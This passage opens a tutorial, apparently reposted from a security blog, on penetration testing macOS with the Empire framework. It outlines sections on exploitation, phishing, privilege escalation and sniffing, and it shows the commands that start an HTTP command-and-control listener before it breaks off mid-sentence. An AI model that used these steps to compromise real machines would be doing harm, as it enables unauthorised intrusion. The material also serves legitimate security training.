From prodefence.org
This article is another post in the empire series. In this article, we will learn OSX Penetration testing using empire.
Table of Content
Exploiting MAC
Post Exploitation
- Phishing
- Privilege Escalation
- Sniffing
Exploiting MAC
Here I’m considering you know PowerShell Empire’s basics, therefore, we will create the listener first using the following commands: uselistener http set Host //192.168.1.26 execute
123 | uselistener httpset Host //192.168.1.26execute |
Executing the above commands will start up the listener as shown in the image above. Now the next step is to create a